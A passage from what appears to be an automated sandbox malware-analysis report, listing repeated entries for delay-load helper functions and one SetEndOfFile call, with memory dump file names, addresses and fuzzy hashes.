                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6e0bffa9aa322c1afe94e538342a4d656f60baca7440a6ec8f2a89a2f5ae2cef
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 6e0bffa9aa322c1afe94e538342a4d656f60baca7440a6ec8f2a89a2f5ae2cef
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            Function 001FE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6dc9f8a42e077de19ed04e6fea4738f2532d76719e085a988d2ab335a0ceae3e
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 6dc9f8a42e077de19ed04e6fea4738f2532d76719e085a988d2ab335a0ceae3e
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            Function 001FE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c376af374a30a2597540a9edefcb3c91168e96f7006e5238cb2fa35cf565682b
                                                            • Instruction ID: 9fd238b3e6a9fa841d9a8e2f0227409a877aacd91a4a7415635f0fa47ed7d983
                                                            • Opcode Fuzzy Hash: c376af374a30a2597540a9edefcb3c91168e96f7006e5238cb2fa35cf565682b
                                                            • Instruction Fuzzy Hash: 67A012E51A42853C300C21001C06C37028CC0D1B30331401DF511900945D4008510432
                                                            Function 001FE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6bb18df8bc8ddebabe5debbb6a1ca172711a71f54b7f46411c794e4da9591b51
                                                            • Instruction ID: 0cf29b9589d5b59fba276a880c696865d1f568cc02dfcab07063b3cb2437e910
                                                            • Opcode Fuzzy Hash: 6bb18df8bc8ddebabe5debbb6a1ca172711a71f54b7f46411c794e4da9591b51
                                                            • Instruction Fuzzy Hash: 7AA012E51A82857C300C21001C06C37028CC0D1B70331441DF50280094594008510432
                                                            Function 001FE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4f7afb27ac6ad3af59cb816032fd5aa438693c12dbbbbea3aaea0a8731603535
                                                            • Instruction ID: 0cf29b9589d5b59fba276a880c696865d1f568cc02dfcab07063b3cb2437e910
                                                            • Opcode Fuzzy Hash: 4f7afb27ac6ad3af59cb816032fd5aa438693c12dbbbbea3aaea0a8731603535
                                                            • Instruction Fuzzy Hash: 7AA012E51A82857C300C21001C06C37028CC0D1B70331441DF50280094594008510432
                                                            Function 001FE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8d9ba14546d2f57f2ad6ff2a73b5b14dafa2e68abfce7bf3c194a818fe94c5ff
                                                            • Instruction ID: 0cf29b9589d5b59fba276a880c696865d1f568cc02dfcab07063b3cb2437e910
                                                            • Opcode Fuzzy Hash: 8d9ba14546d2f57f2ad6ff2a73b5b14dafa2e68abfce7bf3c194a818fe94c5ff
                                                            • Instruction Fuzzy Hash: 7AA012E51A82857C300C21001C06C37028CC0D1B70331441DF50280094594008510432
                                                            Function 001FE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a9b8387a117faab4fb567e746b13bf847a3cc6751be01b490ead1deccbc84700
                                                            • Instruction ID: 0cf29b9589d5b59fba276a880c696865d1f568cc02dfcab07063b3cb2437e910
                                                            • Opcode Fuzzy Hash: a9b8387a117faab4fb567e746b13bf847a3cc6751be01b490ead1deccbc84700
                                                            • Instruction Fuzzy Hash: 7AA012E51A82857C300C21001C06C37028CC0D1B70331441DF50280094594008510432
                                                            Function 001FE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE3FC
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 306d6f5bb41234a735ebd4ba979bf703d115fe306a167ef7bdc8488b034db707
                                                            • Instruction ID: 0cf29b9589d5b59fba276a880c696865d1f568cc02dfcab07063b3cb2437e910
                                                            • Opcode Fuzzy Hash: 306d6f5bb41234a735ebd4ba979bf703d115fe306a167ef7bdc8488b034db707
                                                            • Instruction Fuzzy Hash: 7AA012E51A82857C300C21001C06C37028CC0D1B70331441DF50280094594008510432
                                                            Function 001FE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0a26c7a4a08e9bfa6d236389205c4e25b5e062530d8d031aea977e417d75146b
                                                            • Instruction ID: 1a912d6f4df434777d9ceafe29eb9d210e94ed55227b6dc4ff9ee665bbbd4a67
                                                            • Opcode Fuzzy Hash: 0a26c7a4a08e9bfa6d236389205c4e25b5e062530d8d031aea977e417d75146b
                                                            • Instruction Fuzzy Hash: 95A012C95A91457C300831001C02C3B018CC0D2F60330441DF502800A569400C400470
                                                            Function 001FE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9b916421591ce72561ca34a3f03c43821eea0f6e31c84902fd7d1c9fef5b6fba
                                                            • Instruction ID: 1a912d6f4df434777d9ceafe29eb9d210e94ed55227b6dc4ff9ee665bbbd4a67
                                                            • Opcode Fuzzy Hash: 9b916421591ce72561ca34a3f03c43821eea0f6e31c84902fd7d1c9fef5b6fba
                                                            • Instruction Fuzzy Hash: 95A012C95A91457C300831001C02C3B018CC0D2F60330441DF502800A569400C400470
                                                            Function 001FE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 639b7a9fdf3e06154eb6904086ab115ede0cb1744d06dbc8b268e7fd68b48864
                                                            • Instruction ID: 1a912d6f4df434777d9ceafe29eb9d210e94ed55227b6dc4ff9ee665bbbd4a67
                                                            • Opcode Fuzzy Hash: 639b7a9fdf3e06154eb6904086ab115ede0cb1744d06dbc8b268e7fd68b48864
                                                            • Instruction Fuzzy Hash: 95A012C95A91457C300831001C02C3B018CC0D2F60330441DF502800A569400C400470
                                                            Function 001FE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 10ec8477af238642d4b8539743080c2f01ddda2ef7fb2c509efb8c3ed2e463bd
                                                            • Instruction ID: 1d2ba908b0a84f268967cf0af3fc06dbe4eea1bce522cc432ba770c7b6ea110a
                                                            • Opcode Fuzzy Hash: 10ec8477af238642d4b8539743080c2f01ddda2ef7fb2c509efb8c3ed2e463bd
                                                            • Instruction Fuzzy Hash: E5A012C91E82483C300821601C02C37058CC0E1B21331412DF501840A4694008500830
                                                            Function 001FE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: fbc1a9546d7f91b47bfa1a9e63a8cc5e307b38fc66e4ed779d11edd878c8b9c2
                                                            • Instruction ID: 1a912d6f4df434777d9ceafe29eb9d210e94ed55227b6dc4ff9ee665bbbd4a67
                                                            • Opcode Fuzzy Hash: fbc1a9546d7f91b47bfa1a9e63a8cc5e307b38fc66e4ed779d11edd878c8b9c2
                                                            • Instruction Fuzzy Hash: 95A012C95A91457C300831001C02C3B018CC0D2F60330441DF502800A569400C400470
                                                            Function 001FE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8f59b13d7f7c9a8d7eb51d32e7161287234efec0b58a684f112e94abb76b52a3
                                                            • Instruction ID: fe4469792de9734ad49e690f92d442baeff799726e841e3be1fea4a0fc086a2a
                                                            • Opcode Fuzzy Hash: 8f59b13d7f7c9a8d7eb51d32e7161287234efec0b58a684f112e94abb76b52a3
                                                            • Instruction Fuzzy Hash: 03A012C91EC2497C300821501C02C37018CC0D1B60331442DF502840A4694008500830
                                                            Function 001FE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 72ada836cae8121a1b0074a9afa539fad76ad3baea6d2153ec6f07e3fb7946cc
                                                            • Instruction ID: fe4469792de9734ad49e690f92d442baeff799726e841e3be1fea4a0fc086a2a
                                                            • Opcode Fuzzy Hash: 72ada836cae8121a1b0074a9afa539fad76ad3baea6d2153ec6f07e3fb7946cc
                                                            • Instruction Fuzzy Hash: 03A012C91EC2497C300821501C02C37018CC0D1B60331442DF502840A4694008500830
                                                            Function 001E9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,001E903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 001E9F0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
